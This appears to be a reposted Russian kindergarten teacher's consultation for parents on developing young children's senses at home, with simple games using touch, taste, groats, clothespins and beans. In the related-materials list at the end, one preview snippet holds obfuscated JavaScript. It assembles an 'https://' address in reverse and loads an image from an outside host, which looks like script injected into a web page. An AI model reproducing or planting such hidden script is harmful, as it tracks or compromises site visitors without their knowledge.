Консультация для родителей: "Сенсорное развитие детей в домашних условиях"
консультация (младшая группа) по теме

Аскерханова Марьям Гусеченовна

Сенсорное развитие детей -это развитие их восприятия, формирование понятий о внешних свойствах предметов( форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является наиболее благоприятным для накопления определенных знаний о мире, усовершенствования деятельности органов чувств.

Яркий, меняющийся мир ребенок познает с помощью органов чувств зрения, слуха, обоняния, осязания и вкуса. Информация, полученная с помощью органов чувств, передается в головной мозг, там анализируется и в итоге «выдает» целостную картину. И чем больше разнообразной информации поступает в мозг малыша, тем активнее происходит сенсорное развитие ребенка.

Скачать:

ВложениеРазмер
Файл sensornoe_razvitie_detey_v_domashnih_usloviyah.docx22.57 КБ

Предварительный просмотр:

        Общество с ограниченной ответственностью «Семь гномов»

                 Консультация для родителей:

« Сенсорное развитие детей в домашних условиях»

                                                                                  Подготовила воспитатель:

                                                                         Марьям Гусеченовна Аскерханова

                                     г. Нефтеюганск 2017г

Сенсорное развитие детей -это развитие их восприятия, формирование понятий о внешних свойствах предметов( форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является наиболее благоприятным для накопления определенных знаний о мире, усовершенствования деятельности органов чувств.

Яркий, меняющийся мир ребенок познает с помощью органов чувств зрения, слуха, обоняния, осязания и вкуса. Информация, полученная с помощью органов чувств, передается в головной мозг, там анализируется и в итоге «выдает» целостную картину. И чем больше разнообразной информации поступает в мозг малыша, тем активнее происходит сенсорное развитие ребенка.

Недостаточно предоставить малышу разнообразные предметы для исследования и назвать их свойства. Очень важно научить ребенка анализировать отдельные признаки каждого предмета       ( цвет, запах, форму и вес), чтобы научить его классифицировать объекты. Этому ребенок учится, усваивая так называемые сенсорные эталоны, предметы,  «суть», которых отражает какую – либо из общепринятых абстракций, описывающих качества вещей – к примеру, эталоны формы - это геометрические фигуры, эталоны цвета - семь цветов спектра, эталоны веса- перышко и камень.

Поэтому ребенка нужно сначала научить распознавать  сенсорные эталоны, а затем приучать находить эталонные объекты в реальных вещах (например, в картинке дома, отыскать круглые и прямоугольные части, различные цвета). Сегодня на прилавках магазинов можно найти  массу самых разных игрушек, игр, которые способствуют сенсорному развитию детей.  Однако не стоит забывать,  что учебные пособия, хоть и безусловно полезны для сенсорного развития ребенка, но не могут заменить постижения реального мира.

Поэтому когда вы гуляете с малышом по улице, рассказывайте ему о деревьях, домах, машинах (большие – маленькие, цвет, форма). А когда вы с ним дома – объясняйте все, что интересно вашему ребенку ( называйте цвета его одежды, карандашей, обратите внимание на размер кастрюль и.т.д.). Одним словом, попробуйте взглянуть на мир глазами вашего ребенка.

Больше всего на свете дети любят играть, они играют дома, в детском саду, на улице. Любое увлекательное занятие обозначается для них словом «игра». Через игру ребенок познает окружающую его действительность, свой внутренний мир. И сегодня я хочу предложить вам очень простые, но в тоже время очень интересные, а главное познавательные игры, которые Вы можете организовать с детьми дома.

Игра «Прятки»

Дети обожают играть прятки. Вот и поиграйте с ними. Предложите с закрытыми глазами  на ощупь узнавать свои игрушки. На улице попросите малыша закрыть глаза и попробовать угадать предмет, что вы ему дадите: палку, шишку, камень, песок, цветок.

Игра « Угадай на вкус»

Нарежьте в тарелку небольшие кусочки овощей и фруктов (яблоки, груша, помидор). Предложите малышу закрыть глаза и разжевать какой-нибудь кусочек. Спросите, что это был за вкус                  ( сладкий, кислый, горький, соленый) и как называется то, что он ест.

Игра «Песочница на кухне»

Возьмите поднос и тонким равномерным слоем рассыпьте по подносу  мелкую крупу. Проведите пальчиком ребенка по крупе или позвольте малышу самому нарисовать несколько линий. Такое рисование способствует развитию не только мелкой моторики рук, но и массажирует пальчики Вашего малыша. И плюс ко всему развитие воображения и фантазии.

Игра «Веселые прищепки»

Взять картон и вырезать из картона круг желтого цвета и пусть ребенок прикрепит прищепки к солнышку, сопровождая действия заучиванием стихотворения:

Солнышко, скорей взойди,

И лучи свои пришли.

Чтоб они землю обогрели,

Нас теплом своим согрели.

Игра «Золушка»

В глубокую емкость насыпаем фасоль и запускаем в нее руки и изображаем, как будто мы начинаем месить тесто, приговаривая:

«Месим, месим тесто,

Есть в печи место.

Будут- будут из печи

Булочки и калачи».

Так же можно использовать фасоль и горох вместе, тогда ребенку можно предложить отделить маленькое от большого –  и опять, таки ее величество Сенсорика!

Я сегодня познакомила Вас лишь с малой частью того, чем Вы можете занять Ваш досуг с ребенком дома. Включайте свою фантазию и самое главное, не уставайте постоянно разговаривать со своими детьми. Пусть ребенок находится в постоянном потоке информации, не сомневайтесь, это его не утомит. Чем непринужденнее будет обучение, тем легче и быстрее оно будет проходить. Побуждайте ребенка к игре, играйте с малышом в развивающие и веселые игры. Участвуйте и сами в игровом процессе.  

Это будет отличным способом для установления более прочной связи между Вами и Вашим ребенком!


По теме: методические разработки, презентации и конспекты

Работа по теме самообразования. Консультация для родителей. «СЕНСОРНО- МОТОРНОЕ РАЗВИТИЯ ДЕТЕЙ»

Ребенок начинает познавать мир с самого раннего возраста. Сначала это происходит с помощью сенсорики (разнообразие звуков, красок, форм). Чем больше будет развито сенсорное восприятие у ребенка, тем р...

Консультация для родителей: "Сенсорное развитие детей в домашних условиях".

Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является на...

Консультация для родителей "Сенсорное развитие детей в домашних условиях"

Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе и т.д.). Яркий, меняющийся мир ребенок позна...

Консультация для родителей «Сенсорное развитие детей в домашних условиях»

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document...

Консультация для родителей "Познавательное развитие детей в домашних условиях"

Традиционно главным институтом воспитания является семья. То, что ребёнок в детские годы приобретает в семье, он сохраняет в течение всей последующей жизни. Важность семьи как института воспитания обу...

Консультация для родителей «Речевое развитие детей в домашних условиях»

Цель: побуждать родителей к занятиям, направленным на развитие речи, в домашних условиях, выполнять домашнее задание. Привлечение родителей к участию в развитии « Речевого уголка» в группе...